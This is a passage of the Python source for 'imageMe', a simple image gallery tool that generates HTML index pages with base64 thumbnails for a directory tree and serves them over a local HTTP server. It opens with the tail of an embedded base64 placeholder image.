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UAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAF
FFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF
ABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFAH/9k='
class BackgroundIndexFileGenerator:
def __init__(self, dir_path):
self.dir_path = dir_path
self.thread = threading.Thread(target=self._process, args=())
self.thread.daemon = True
def _process(self):
_create_index_files(self.dir_path)
def run(self):
self.thread.start()
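# Used from serve_dir() below: once the fast, unprocessed first-pass indexes are
# being served, an instance of this class regenerates them with thumbnails in a
# background daemon thread.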
def _clean_up(paths):
"""
Clean up after ourselves, removing created files.
    @param {[String]} paths - A list of file paths specifying the files we've
        created during run. Will all be deleted.
@return {None}
"""
print('Cleaning up')
# Iterate over the given paths, unlinking them
for path in paths:
print('Removing %s' % path)
os.unlink(path)
def _create_index_file(
root_dir, location, image_files, dirs, force_no_processing=False):
"""
Create an index file in the given location, supplying known lists of
present image files and subdirectories.
@param {String} root_dir - The root directory of the entire crawl. Used to
ascertain whether the given location is the top level.
@param {String} location - The current directory of the crawl. The index
file will be created here.
@param {[String]} image_files - A list of image file names in the location.
These will be displayed in the index file's gallery.
@param {[String]} dirs - The subdirectories of the location directory.
These will be displayed as links further down the file structure.
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process thumbnails, PIL images or anything. Simply index
<img> tags with original file src attributes.
@return {String} The full path (location plus filename) of the newly
created index file. Intended for usage cleaning up created files.
"""
# Put together HTML as a list of the lines we'll want to include
# Issue #2 exists to do this better than HTML in-code
header_text = \
'imageMe: ' + location + ' [' + str(len(image_files)) + ' image(s)]'
html = [
'<!DOCTYPE html>',
'<html>',
' <head>',
        ' <title>imageMe</title>',
' <style>',
' html, body {margin: 0;padding: 0;}',
' .header {text-align: right;}',
' .content {',
' padding: 3em;',
' padding-left: 4em;',
' padding-right: 4em;',
' }',
' .image {max-width: 100%; border-radius: 0.3em;}',
' td {width: ' + str(100.0 / IMAGES_PER_ROW) + '%;}',
' </style>',
' </head>',
' <body>',
' <div class="content">',
' <h2 class="header">' + header_text + '</h2>'
]
# Populate the present subdirectories - this includes '..' unless we're at
# the top level
directories = []
if root_dir != location:
directories = ['..']
directories += dirs
if len(directories) > 0:
html.append('<hr>')
# For each subdirectory, include a link to its index file
for directory in directories:
link = directory + '/' + INDEX_FILE_NAME
html += [
' <h3 class="header">',
' <a href="' + link + '">' + directory + '</a>',
' </h3>'
]
# Populate the image gallery table
# Counter to cycle down through table rows
table_row_count = 1
html += ['<hr>', '<table>']
# For each image file, potentially create a new <tr> and create a new <td>
for image_file in image_files:
if table_row_count == 1:
html.append('<tr>')
img_src = _get_thumbnail_src_from_file(
location, image_file, force_no_processing
)
link_target = _get_image_link_target_from_file(
location, image_file, force_no_processing
)
html += [
' <td>',
' <a href="' + link_target + '">',
' <img class="image" src="' + img_src + '">',
' </a>',
' </td>'
]
if table_row_count == IMAGES_PER_ROW:
table_row_count = 0
html.append('</tr>')
table_row_count += 1
html += ['</tr>', '</table>']
html += [
' </div>',
' </body>',
'</html>'
]
# Actually create the file, now we've put together the HTML content
index_file_path = _get_index_file_path(location)
print('Creating index file %s' % index_file_path)
    with open(index_file_path, 'w') as index_file:
        index_file.write('\n'.join(html))
# Return the path for cleaning up later
return index_file_path
def _create_index_files(root_dir, force_no_processing=False):
"""
Crawl the root directory downwards, generating an index HTML file in each
directory on the way down.
@param {String} root_dir - The top level directory to crawl down from. In
normal usage, this will be '.'.
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process thumbnails, PIL images or anything. Simply index
<img> tags with original file src attributes.
@return {[String]} Full file paths of all created files.
"""
# Initialise list of created file paths to build up as we make them
created_files = []
# Walk the root dir downwards, creating index files as we go
for here, dirs, files in os.walk(root_dir):
print('Processing %s' % here)
        # Sort the subdirectories by name, in place so os.walk also descends
        # into them in sorted order
        dirs.sort()
# Get image files - all files in the directory matching IMAGE_FILE_REGEX
image_files = [f for f in files if re.match(IMAGE_FILE_REGEX, f)]
# Sort the image files by name
image_files = sorted(image_files)
# Create this directory's index file and add its name to the created
# files list
created_files.append(
_create_index_file(
root_dir, here, image_files, dirs, force_no_processing
)
)
# Return the list of created files
return created_files
def _get_image_from_file(dir_path, image_file):
"""
Get an instance of PIL.Image from the given file.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@return {PIL.Image} An instance of the image file as a PIL Image, or None
if the functionality is not available. This could be because PIL is not
present, or because it can't process the given file type.
"""
# Save ourselves the effort if PIL is not present, and return None now
if not PIL_ENABLED:
return None
# Put together full path
path = os.path.join(dir_path, image_file)
# Try to read the image
img = None
try:
img = Image.open(path)
except IOError as exptn:
print('Error loading image file %s: %s' % (path, exptn))
# Return image or None
return img
def _get_image_link_target_from_file(dir_path, image_file, force_no_processing=False):
"""
Get the value to be used as the href for links from thumbnail images. For
most image formats this will simply be the image file name itself. However,
some image formats (tif) are not natively displayable by many browsers and
therefore we must link to image data in another format.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process a thumbnail, PIL image or anything. Simply return the
image filename as src.
@return {String} The href to use.
"""
# If we've specified to force no processing, just return the image filename
if force_no_processing:
return image_file
# First try to get an image
img = _get_image_from_file(dir_path, image_file)
    # If we couldn't load the image (no PIL, or an unreadable file), fall back
    # to the filename itself
    if img is None:
        return image_file
    # If format is directly displayable in-browser, just return the filename
    # Else, we need to return a full-sized chunk of displayable image data
    if img.format.lower() in ['tif', 'tiff']:
return _get_image_src_from_file(
dir_path, image_file, force_no_processing
)
return image_file
def _get_image_src_from_file(dir_path, image_file, force_no_processing=False):
"""
Get base-64 encoded data as a string for the given image file's full image,
for use directly in HTML <img> tags, or a path to the original if image
scaling is not supported.
This is a full-sized version of _get_thumbnail_src_from_file, for use in
image formats which cannot be displayed directly in-browser, and therefore
need processed versions even at full size.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process a thumbnail, PIL image or anything. Simply return the
image filename as src.
@return {String} The base-64 encoded image data string, or path to the file
itself if not supported.
"""
# If we've specified to force no processing, just return the image filename
if force_no_processing:
if image_file.endswith('tif') or image_file.endswith('tiff'):
return UNSUPPORTED_IMAGE_TYPE_DATA
return image_file
# First try to get an image
img = _get_image_from_file(dir_path, image_file)
return _get_src_from_image(img, image_file)
def _get_index_file_path(location):
"""
Get the full file path to be used for an index file in the given location.
Yields location plus the constant INDEX_FILE_NAME.
@param {String} location - A directory location in which we want to create
a new index file.
@return {String} A file path for usage with a new index file.
"""
return os.path.join(location, INDEX_FILE_NAME)
def _get_server_port():
    """
    Get the port for the server to run on. If given as the first command line
    argument, we'll use that; otherwise we fall back to the PORT global (8000
    by default, possibly overridden via argparse).
    @return {Integer} The port to run the server on.
    """
    port = PORT
    try:
        port = int(sys.argv[1])
        print("Setting port to", port)
    except (IndexError, ValueError):
        print("Could not read a port from", sys.argv, "- using", port)
    return port
def _get_src_from_image(img, fallback_image_file):
"""
Get base-64 encoded data as a string for the given image. Fallback to return
fallback_image_file if cannot get the image data or img is None.
@param {Image} img - The PIL Image to get src data for
@param {String} fallback_image_file - The filename of the image file,
to be used when image data capture fails
@return {String} The base-64 encoded image data string, or path to the file
itself if not supported.
"""
# If the image is None, then we can't process, so we should return the
# path to the file itself
if img is None:
return fallback_image_file
# Target format should be the same as the original image format, unless it's
# a TIF/TIFF, which can't be displayed by most browsers; we convert these
# to jpeg
target_format = img.format
if target_format.lower() in ['tif', 'tiff']:
target_format = 'JPEG'
# If we have an actual Image, great - put together the base64 image string
try:
bytesio = io.BytesIO()
img.save(bytesio, target_format)
byte_value = bytesio.getvalue()
        # b64encode returns bytes in Python 3, so decode before string formatting
        b64 = base64.b64encode(byte_value).decode('ascii')
        return 'data:image/%s;base64,%s' % (target_format.lower(), b64)
except IOError as exptn:
print('IOError while saving image bytes: %s' % exptn)
return fallback_image_file
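# Illustrative output only (file name and data are made up): for a PNG that PIL
# can read, _get_src_from_image(img, 'cat.png') should yield something like
# 'data:image/png;base64,iVBORw0KG...', which drops straight into an <img> src
# attribute; if img is None the plain filename 'cat.png' is returned instead.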
def _get_thumbnail_image_from_file(dir_path, image_file):
"""
Get a PIL.Image from the given image file which has been scaled down to
THUMBNAIL_WIDTH wide.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@return {PIL.Image} An instance of the thumbnail as a PIL Image, or None
if the functionality is not available. See _get_image_from_file for
details.
"""
# Get image
img = _get_image_from_file(dir_path, image_file)
# If it's not supported, exit now
if img is None:
return None
if img.format.lower() == 'gif':
return None
# Get image dimensions
img_width, img_height = img.size
# We need to perform a resize - first, work out the scale ratio to take the
# image width to THUMBNAIL_WIDTH (THUMBNAIL_WIDTH:img_width ratio)
scale_ratio = THUMBNAIL_WIDTH / float(img_width)
# Work out target image height based on the scale ratio
target_height = int(scale_ratio * img_height)
# Perform the resize
try:
img.thumbnail((THUMBNAIL_WIDTH, target_height), resample=RESAMPLE)
except IOError as exptn:
print('WARNING: IOError when thumbnailing %s/%s: %s' % (
dir_path, image_file, exptn
))
return None
# Return the resized image
return img
def _get_thumbnail_src_from_file(dir_path, image_file, force_no_processing=False):
"""
Get base-64 encoded data as a string for the given image file's thumbnail,
for use directly in HTML <img> tags, or a path to the original if image
scaling is not supported.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process a thumbnail, PIL image or anything. Simply return the
image filename as src.
@return {String} The base-64 encoded image data string, or path to the file
itself if not supported.
"""
# If we've specified to force no processing, just return the image filename
if force_no_processing:
if image_file.endswith('tif') or image_file.endswith('tiff'):
return UNSUPPORTED_IMAGE_TYPE_DATA
return image_file
# First try to get a thumbnail image
img = _get_thumbnail_image_from_file(dir_path, image_file)
return _get_src_from_image(img, image_file)
def _run_server(dir_path):
"""
Run the image server. This is blocking. Will handle user KeyboardInterrupt
and other exceptions appropriately and return control once the server is
stopped.
@return {None}
"""
# Get the port to run on
port = _get_server_port()
os.chdir(dir_path)
    # Configure allow_reuse_address to make re-runs of the script less painful -
    # if this is not True then waiting for the address to be freed after the
    # last run can block a subsequent run. Set it on the class we actually
    # instantiate below.
    ThreadingHTTPServer.allow_reuse_address = True
# Create the server instance
server = ThreadingHTTPServer(('', port), SimpleHTTPRequestHandler)
# Print out before actually running the server (cheeky / optimistic, however
# you want to look at it)
print('Your images are at http://localhost:%d/%s' % (
port,
INDEX_FILE_NAME
))
# Try to run the server
try:
# Run it - this call blocks until the server is killed
server.serve_forever()
except KeyboardInterrupt:
# This is the expected way of the server being killed, since imageMe is
# intended for ad-hoc running from command line
print('User interrupted, stopping')
except Exception as exptn:
# Catch everything else - this will handle shutdowns via other signals
# and faults actually starting the server in the first place
print(exptn)
print('Unhandled exception in server, stopping')
def serve_dir(dir_path):
"""
Generate indexes and run server from the given directory downwards.
@param {String} dir_path - The directory path (absolute, or relative to CWD)
@return {None}
"""
# Create index files, and store the list of their paths for cleanup later
# This time, force no processing - this gives us a fast first-pass in terms
# of page generation, but potentially slow serving for large image files
print('Performing first pass index file generation')
created_files = _create_index_files(dir_path, True)
    if PIL_ENABLED:
        # If PIL is enabled, we'd like to process the HTML indexes to include
        # generated thumbnails - this slows down generation so we don't do it
        # first time around, but now we're serving it's good to do it in the
        # background
        print('Performing PIL-enhanced optimised index file generation in background')
background_indexer = BackgroundIndexFileGenerator(dir_path)
background_indexer.run()
# Run the server in the current location - this blocks until it's stopped
_run_server(dir_path)
# Clean up the index files created earlier so we don't make a mess of
# the image directories
_clean_up(created_files)
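# Example of module usage (path is hypothetical): after `import imageme`, calling
# imageme.serve_dir('/path/to/photos') builds imageme.html indexes down the tree,
# blocks while serving them over HTTP, and deletes the generated index files when
# the server is stopped.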
def parse_args():
    parser = argparse.ArgumentParser(description='imageMe: a simple image gallery server')
    parser.add_argument('-v', '--verbose', action="store_true", help='verbose output')
